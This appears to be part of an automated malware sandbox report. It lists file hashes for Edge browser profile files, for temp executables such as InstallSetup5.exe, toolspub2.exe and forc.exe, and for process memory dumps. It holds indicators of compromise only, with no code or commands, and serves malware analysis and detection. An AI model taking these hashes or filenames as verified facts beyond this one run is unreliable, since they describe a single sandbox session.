| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
\??\pipe\LOCAL\crashpad_3896_WICWVGNDWZDCQLUB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\pipe\LOCAL\crashpad_2168_EPEZPMJPXSYAUOAF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1b7972e183c2b018fedb825ca909712e |
| SHA1 | c504463cd32b381139f1950aa27ca9e8516f9c75 |
| SHA256 | 048b9cc2ecd12162cf9d7919072744f64571ce53c7694e0819d05f4d7ef09480 |
| SHA512 | c43ea4f3643501f11ab5517d88d450a418011a61ea76be82eedf5bf26a27687e9d0e04a9973aae67cc3741cb157b1a6b6a5cbd8d1f2336e307ad973ac93f6584 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 73d9a51a609986d9786a6361047c6960 |
| SHA1 | e52fcdd31d3d0ff1cb96bea53d5620df431dcc9d |
| SHA256 | 70b6c3a2b502b038a5ee9bb0248db2f17d372857207fff9d0764961b92ff9af4 |
| SHA512 | f354714498ef17fd2aae03c205f1663e192baf3d8b840c7041a0dffa2ac8a240efc3213ccc20123aa2c23b7f1bbc130e71c3f7ce77985bea5b2dbc4b88e37a6b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 73d9a51a609986d9786a6361047c6960 |
| SHA1 | e52fcdd31d3d0ff1cb96bea53d5620df431dcc9d |
| SHA256 | 70b6c3a2b502b038a5ee9bb0248db2f17d372857207fff9d0764961b92ff9af4 |
| SHA512 | f354714498ef17fd2aae03c205f1663e192baf3d8b840c7041a0dffa2ac8a240efc3213ccc20123aa2c23b7f1bbc130e71c3f7ce77985bea5b2dbc4b88e37a6b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8242b07c7c356392cf5e8af5b17e0715 |
| SHA1 | 6ea836464a5fa8e7d9ead0f833ed83162c0b5cbd |
| SHA256 | 95db9144e4a8863e9b16df89e4bd8f1f280e97cf43b6f6ed65b0461b6c135b5b |
| SHA512 | 1cf3eb87846ef589eab3ff84af5bcc1a683c503a8bfca3f6c77107d191e18df8a1daabc874383b6b4d9f5122ee7e1b5f9301451fad808fbc0be8d3c7ac359457 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8242b07c7c356392cf5e8af5b17e0715 |
| SHA1 | 6ea836464a5fa8e7d9ead0f833ed83162c0b5cbd |
| SHA256 | 95db9144e4a8863e9b16df89e4bd8f1f280e97cf43b6f6ed65b0461b6c135b5b |
| SHA512 | 1cf3eb87846ef589eab3ff84af5bcc1a683c503a8bfca3f6c77107d191e18df8a1daabc874383b6b4d9f5122ee7e1b5f9301451fad808fbc0be8d3c7ac359457 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
\??\pipe\LOCAL\crashpad_3908_KZEEATFHQVCAZTFF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
\??\pipe\LOCAL\crashpad_3500_LZGSINVRSQZDYJVI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 83fa2136979811abf95de889bfe09ffc |
| SHA1 | 2d6a4929f85b940c70e7e206589244f40d605171 |
| SHA256 | b465249109d22c3739fc1f22c27b7fc0ce1d3ef0a31a96dd262a99364f93bf41 |
| SHA512 | 9e34427856bcd10345ff79ba3fe89859cb584d544bc92b18680715137bedcc10390382538d4b2cd12f174a7afb48d449d1a48677215ee870e2a4a9a3c3362e36 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c754b4ea9ad7494ea1b2a4244cf9045c |
| SHA1 | 6b74aa21fdd12ea56a0a0fcca8719f15dfed7a6d |
| SHA256 | 8f953d21eb72b6df9c172b344de1980017ad01a23c67c7e46ae9ee6621946ccc |
| SHA512 | c89aadcf9023b967fe36c6119c0fa98a673cf70203eba7f3a3e2c9f8c1eb1a677fdeddb8ca2d483b96b6e60872601797fed4365493ef9656adaa8e711f5a3e39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c754b4ea9ad7494ea1b2a4244cf9045c |
| SHA1 | 6b74aa21fdd12ea56a0a0fcca8719f15dfed7a6d |
| SHA256 | 8f953d21eb72b6df9c172b344de1980017ad01a23c67c7e46ae9ee6621946ccc |
| SHA512 | c89aadcf9023b967fe36c6119c0fa98a673cf70203eba7f3a3e2c9f8c1eb1a677fdeddb8ca2d483b96b6e60872601797fed4365493ef9656adaa8e711f5a3e39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1b7972e183c2b018fedb825ca909712e |
| SHA1 | c504463cd32b381139f1950aa27ca9e8516f9c75 |
| SHA256 | 048b9cc2ecd12162cf9d7919072744f64571ce53c7694e0819d05f4d7ef09480 |
| SHA512 | c43ea4f3643501f11ab5517d88d450a418011a61ea76be82eedf5bf26a27687e9d0e04a9973aae67cc3741cb157b1a6b6a5cbd8d1f2336e307ad973ac93f6584 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 83fa2136979811abf95de889bfe09ffc |
| SHA1 | 2d6a4929f85b940c70e7e206589244f40d605171 |
| SHA256 | b465249109d22c3739fc1f22c27b7fc0ce1d3ef0a31a96dd262a99364f93bf41 |
| SHA512 | 9e34427856bcd10345ff79ba3fe89859cb584d544bc92b18680715137bedcc10390382538d4b2cd12f174a7afb48d449d1a48677215ee870e2a4a9a3c3362e36 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8242b07c7c356392cf5e8af5b17e0715 |
| SHA1 | 6ea836464a5fa8e7d9ead0f833ed83162c0b5cbd |
| SHA256 | 95db9144e4a8863e9b16df89e4bd8f1f280e97cf43b6f6ed65b0461b6c135b5b |
| SHA512 | 1cf3eb87846ef589eab3ff84af5bcc1a683c503a8bfca3f6c77107d191e18df8a1daabc874383b6b4d9f5122ee7e1b5f9301451fad808fbc0be8d3c7ac359457 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 73d9a51a609986d9786a6361047c6960 |
| SHA1 | e52fcdd31d3d0ff1cb96bea53d5620df431dcc9d |
| SHA256 | 70b6c3a2b502b038a5ee9bb0248db2f17d372857207fff9d0764961b92ff9af4 |
| SHA512 | f354714498ef17fd2aae03c205f1663e192baf3d8b840c7041a0dffa2ac8a240efc3213ccc20123aa2c23b7f1bbc130e71c3f7ce77985bea5b2dbc4b88e37a6b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2IX3959.exe
| MD5 | c00b3416e4108868945091c1b26cb4df |
| SHA1 | 0ad8aab58ea06a10a5e4f6a94da906b4b3a5b312 |
| SHA256 | 8bff02597a11036aabd7aacf5bcc040a13896b0ab05d333f2b2daf45a472e43b |
| SHA512 | 48d5f6d22317678dc4e1e39116ed87f63d333e837c5449a95cc00607540f1bc16a6bc8cb85aabb137cf7ff28092363ecec730dbd6595ee690d1eccf7b616e124 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1701baa9ca22192b52b1224723ec2433 |
| SHA1 | c0b61314b8c81bbd2a3740bc6a31ec29134d96c6 |
| SHA256 | 6cdcb85f2dba7b64e7118196847dd06e000741d23e98895e08ae066604f5841d |
| SHA512 | 87e10bf2685da967563cfe921054df1ae9cc2b20ffef8c19fa85b5f70fb98798423b73da8009d748c16725156dec45742218114a1618b909d7596d178e1557f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1b7972e183c2b018fedb825ca909712e |
| SHA1 | c504463cd32b381139f1950aa27ca9e8516f9c75 |
| SHA256 | 048b9cc2ecd12162cf9d7919072744f64571ce53c7694e0819d05f4d7ef09480 |
| SHA512 | c43ea4f3643501f11ab5517d88d450a418011a61ea76be82eedf5bf26a27687e9d0e04a9973aae67cc3741cb157b1a6b6a5cbd8d1f2336e307ad973ac93f6584 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c754b4ea9ad7494ea1b2a4244cf9045c |
| SHA1 | 6b74aa21fdd12ea56a0a0fcca8719f15dfed7a6d |
| SHA256 | 8f953d21eb72b6df9c172b344de1980017ad01a23c67c7e46ae9ee6621946ccc |
| SHA512 | c89aadcf9023b967fe36c6119c0fa98a673cf70203eba7f3a3e2c9f8c1eb1a677fdeddb8ca2d483b96b6e60872601797fed4365493ef9656adaa8e711f5a3e39 |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2IX3959.exe
| MD5 | c00b3416e4108868945091c1b26cb4df |
| SHA1 | 0ad8aab58ea06a10a5e4f6a94da906b4b3a5b312 |
| SHA256 | 8bff02597a11036aabd7aacf5bcc040a13896b0ab05d333f2b2daf45a472e43b |
| SHA512 | 48d5f6d22317678dc4e1e39116ed87f63d333e837c5449a95cc00607540f1bc16a6bc8cb85aabb137cf7ff28092363ecec730dbd6595ee690d1eccf7b616e124 |
memory/6328-210-0x0000000000400000-0x0000000000433000-memory.dmp
memory/6328-211-0x0000000000400000-0x0000000000433000-memory.dmp
memory/6328-212-0x0000000000400000-0x0000000000433000-memory.dmp
memory/6328-216-0x0000000000400000-0x0000000000433000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe
| MD5 | b938034561ab089d7047093d46deea8f |
| SHA1 | d778c32cc46be09b107fa47cf3505ba5b748853d |
| SHA256 | 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161 |
| SHA512 | 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b |
memory/6604-229-0x0000000000400000-0x000000000040B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe
| MD5 | b938034561ab089d7047093d46deea8f |
| SHA1 | d778c32cc46be09b107fa47cf3505ba5b748853d |
| SHA256 | 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161 |
| SHA512 | 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b |
memory/3380-302-0x0000000002550000-0x0000000002566000-memory.dmp
memory/6604-304-0x0000000000400000-0x000000000040B000-memory.dmp
memory/5952-313-0x0000000000400000-0x000000000043C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7286b90eb655c26f0a92a3c83e91e811 |
| SHA1 | 07e0fbb7db23910db3af89ce7686b852f4292c0f |
| SHA256 | 4ba8d38c2dfe4d52b344f9e0c2e4ffc4fe583f8d3eae02ec4e27f8c8246911ea |
| SHA512 | 4f866e5396feb75d0a552f433a651e78ceec99c0fcc591e0b571a8cca2a1772017b3dc2ca2250d6415c8276846a8dd16374206037d95ff6523d2e292f5e4c256 |
memory/5952-320-0x00000000747E0000-0x0000000074F90000-memory.dmp
memory/5952-321-0x0000000007E50000-0x00000000083F4000-memory.dmp
memory/5952-322-0x0000000007980000-0x0000000007A12000-memory.dmp
memory/5952-326-0x0000000007A40000-0x0000000007A4A000-memory.dmp
memory/5952-325-0x0000000007B00000-0x0000000007B10000-memory.dmp
memory/4848-329-0x0000000000400000-0x0000000000488000-memory.dmp
memory/4848-331-0x0000000000400000-0x0000000000488000-memory.dmp
memory/4848-330-0x0000000000400000-0x0000000000488000-memory.dmp
memory/4848-333-0x0000000000400000-0x0000000000488000-memory.dmp
memory/5952-334-0x0000000008A20000-0x0000000009038000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
memory/5952-341-0x0000000008400000-0x000000000850A000-memory.dmp
memory/5952-342-0x0000000007C20000-0x0000000007C32000-memory.dmp
memory/5952-345-0x0000000007C80000-0x0000000007CBC000-memory.dmp
memory/5952-346-0x0000000007D10000-0x0000000007D5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 896b1abcc0089a35074d0f6334d41d62 |
| SHA1 | 3d8ac1976c27b44053eb71787546f84ccf490c19 |
| SHA256 | 90f03eb4c708b85a183dcc66e2d1577741bba380302714279833bf2c0f2019ec |
| SHA512 | d1049e3a658a4481c6197deb297be4975c2f4e9e47a1535fe718b631bfa801524979d24da7ed67e91b9dfc9a14a6d98452151ea18aba7fa999e4c9dd23221284 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 0b8abe9b2d273da395ec7c5c0f376f32 |
| SHA1 | d7b266fb7310cc71ab5fdb0ef68f5788e702f2ec |
| SHA256 | 3751deeb9ad3db03e6b42dedcac68c1c9c7926a2beeaaa0820397b6ddb734a99 |
| SHA512 | 3dd503ddf2585038aa2fedc53d20bb9576f4619c3dc18089d7aba2c12dc0288447b2a481327c291456d7958488ba2e2d4028af4ca2d30e92807c8b1cdcffc404 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | 923a543cc619ea568f91b723d9fb1ef0 |
| SHA1 | 6f4ade25559645c741d7327c6e16521e43d7e1f9 |
| SHA256 | bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd |
| SHA512 | a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 7d75a9eb3b38b5dd04b8a7ce4f1b87cc |
| SHA1 | 68f598c84936c9720c5ffd6685294f5c94000dff |
| SHA256 | 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7 |
| SHA512 | cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032
| MD5 | fdbf5bcfbb02e2894a519454c232d32f |
| SHA1 | 5e225710e9560458ac032ab80e24d0f3cb81b87a |
| SHA256 | d9315d0678ac213bbe2c1de27528f82fd40dbff160f5a0c19850f891da29ea1c |
| SHA512 | 9eb86ebb1b50074df9bd94f7660df6f362b5a46411b35ce820740f629f8ef77f0b49a95c5550441a7db2b2638f0ed3d0204cb8f8c76391c05401506833b8c916 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000034
| MD5 | 4e08109ee6888eeb2f5d6987513366bc |
| SHA1 | 86340f5fa46d1a73db2031d80699937878da635e |
| SHA256 | bf44187e1683e78d3040bcef6263e25783c6936096ff0a621677d411dd9d1339 |
| SHA512 | 4e477fd9e58676c0e00744dbe3421e528dd2faeca2ab998ebbeb349b35bb3711dcf78d8c9e7adba66b4d681d1982c31cac42024c8b19e19537a5615dac39c661 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e
| MD5 | 740a924b01c31c08ad37fe04d22af7c5 |
| SHA1 | 34feb0face110afc3a7673e36d27eee2d4edbbff |
| SHA256 | f0e1953b71cc4abbffdd5096d99dfb274688e517c381b15c3446c28a4ac416e0 |
| SHA512 | da7061f944c69245c2f66b0e6a8b5a9bca91bda8a73f99734dcb23db56c5047de796fa7e348ff8840d9ac123436e38a4206408573215b7e5e98942ea6d66bb7c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57f339.TMP
| MD5 | 646fb97c3cf665d1f2519f848c8aed8f |
| SHA1 | c5beab64b8b43296b906582278154cc3e33abd22 |
| SHA256 | 6906a7e6d79e8da7ab662b8b729848b806b4bddd12dd0ad0e1dbf6ef511409d8 |
| SHA512 | 803177bddb0ad91b1f6520e2d1edd4305f4435e304159809b1f2e31e8c46dcb67cf6c2fb87cbc094b9a4f125a858f977394ed99707da1e6524a4040bbd2ac5bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5134d4cdf37882ff3e63ca773c175035 |
| SHA1 | e1b5459f7adb8f4a42e381ee7ece489256bb436e |
| SHA256 | 03cee462cbe9abd2d34f92eba8e66b3e1c0be05535ac483838d0b455b0dbad6e |
| SHA512 | 9b87733f8b696dbbbe7490eebff79a895ba3f4435d2ba1255f3f86c8cdc0edd6e1e7583c8c0642b28273c5e7b71931e2d355606b09f1735ecad2ad2a70446484 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ca510cc191b6b20cf2ad1167ae4ba5a8 |
| SHA1 | 5b6fa5924f2e2380799f755ce51ff856f4e6eeb6 |
| SHA256 | 35c7650f14202631941b56152a1e3b6c2ce0897a11b30cca8135d2866b50148b |
| SHA512 | 344dbc42562b13ee2f250ccaed4eeacbfa7f46e62157ed4dd3658b9f178e25b76dcaa056e99666ec6f5c56dcd445e1448f97966fb79ee3365cced3f36acc7252 |
memory/2860-676-0x0000000000400000-0x000000000046F000-memory.dmp
memory/2860-677-0x0000000000470000-0x00000000004CA000-memory.dmp
memory/5952-681-0x00000000747E0000-0x0000000074F90000-memory.dmp
memory/2860-682-0x00000000747E0000-0x0000000074F90000-memory.dmp
memory/2860-683-0x0000000004A90000-0x0000000004AA0000-memory.dmp
memory/2860-684-0x0000000008100000-0x0000000008166000-memory.dmp
memory/2860-685-0x0000000008B10000-0x0000000008B86000-memory.dmp
memory/2860-686-0x0000000008BF0000-0x0000000008DB2000-memory.dmp
memory/2860-687-0x0000000008DD0000-0x00000000092FC000-memory.dmp
memory/2860-688-0x0000000009400000-0x000000000941E000-memory.dmp
memory/2860-689-0x0000000002470000-0x00000000024C0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 364a82ef9964c62d99d6f8c7093a8522 |
| SHA1 | eb9487ee4a31b549a1d96dc32f7ce1fe5133f57b |
| SHA256 | 21c00f02ca1152fac6adc9513b1a813ec5008bba50b614ef9c6bca510ac73a91 |
| SHA512 | 954b16072c5fff54513a66949b457b5c59acc3e220295d2a82469d08ab71f675748eacab3d587482dd030ecf490eeb73211aba7289f36a95a3b8254d6f0c41b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 66cb74400963de937bc85b21312c6f57 |
| SHA1 | 7fca668847be7b24e5838f2f71f1bfdf007303a7 |
| SHA256 | 49071e82aeb0aa5e624e69ac9b7f1f20d67d9ec6e2ebb0998da4c3f6fb0e3aac |
| SHA512 | ac24388bb1c5d66ad9eaa304f8ee0c8252f9c914550ffe066a67637c08495d00e55bc541875271b29a1134ec97ae459a845906b5cf42f9f490b2001ed4ed2444 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 834ab3d44d550beb62104c65c7da6d9d |
| SHA1 | e2fbb5e43f38e6794e0533fdd220d486d584b1d8 |
| SHA256 | 644e96369aa1614bfe17c35e82020cc78193c28e5be8c3fad27462bd210a9460 |
| SHA512 | 7f9c21ef0c332785751d5735ae811bab92df6138e1d97630282796dd9d80e126cb069502fb09bc65992afbb42c42e6574a1664beac0a0c3b5d889a9601ebd59e |
memory/2860-725-0x0000000000400000-0x000000000046F000-memory.dmp
memory/2860-726-0x00000000747E0000-0x0000000074F90000-memory.dmp
memory/5860-737-0x00000000747E0000-0x0000000074F90000-memory.dmp
memory/5860-738-0x00000000002F0000-0x0000000000F8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | f13cf6c130d41595bc96be10a737cb18 |
| SHA1 | 6b14ea97930141aa5caaeeeb13dd4c6dad55d102 |
| SHA256 | dd7aaf7ef0e5b3797eaf5182e7b192fa014b735e129e00e0c662829ce0c2515f |
| SHA512 | ccd4f57b1af1f348fcf9f519a4789c04b499ac5e02ccb7333d0a42fa1cb1fdf9f969103b3a5467e278cd5c6cbbbbebaac4577d0c220e13335575a13408c79b48 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 6f38e2c344007fa6c5a609f3baa82894 |
| SHA1 | 9296d861ae076ebddac76b490c2e56fcd0d63c6d |
| SHA256 | fb1b0639a3bdd51f914bf71948d88555e1bbb9de0937f8fa94e7aa38a8d6ab9f |
| SHA512 | 5432ab0139ee88a7b509d60ed39d3b69f7c38fe94613b3d72cc4480112d95b2cbf7652438801e7e7956aca73d6ebc870851814bec0082f4d77737a024990e059 |
memory/6320-748-0x000001FB04810000-0x000001FB048FE000-memory.dmp
memory/6320-760-0x00007FFEDF5D0000-0x00007FFEE0091000-memory.dmp
memory/6320-767-0x000001FB04D00000-0x000001FB04D10000-memory.dmp
memory/6320-769-0x000001FB1EDD0000-0x000001FB1EEB0000-memory.dmp
memory/5192-773-0x0000000000EB0000-0x0000000000EB1000-memory.dmp
memory/6320-771-0x000001FB1EEB0000-0x000001FB1EF90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | a98f00f0876312e7f85646d2e4fe9ded |
| SHA1 | 5d6650725d89fea37c88a0e41b2486834a8b7546 |
| SHA256 | 787892fff0e39d65ccf86bb7f945be728287aaf80064b7acc84b9122e49d54e6 |
| SHA512 | f5ca9ec79d5639c06727dd106e494a39f12de150fbfbb0461d5679aed6a137b3781eedf51beaf02b61d183991d8bca4c08a045a83412525d1e28283856fa3802 |
C:\Users\Admin\AppData\Local\Temp\forc.exe
| MD5 | 02d1af12b47621a72f44d2ae6bb70e37 |
| SHA1 | 4e0cc70c068e55cd502d71851decb96080861101 |
| SHA256 | 8d2a83ac263e56c2c058d84f67e23db8fe651b556423318f17389c2780351318 |
| SHA512 | ecf9114bbac62c81457f90a6d1c845901ece21e36ca602a79ba6c33f76a1117162175f0ace8ae6c2bdc9f962bd797ab9393316238adbc3b40a9b948d3c98582c |
memory/6320-774-0x000001FB1EF90000-0x000001FB1F058000-memory.dmp
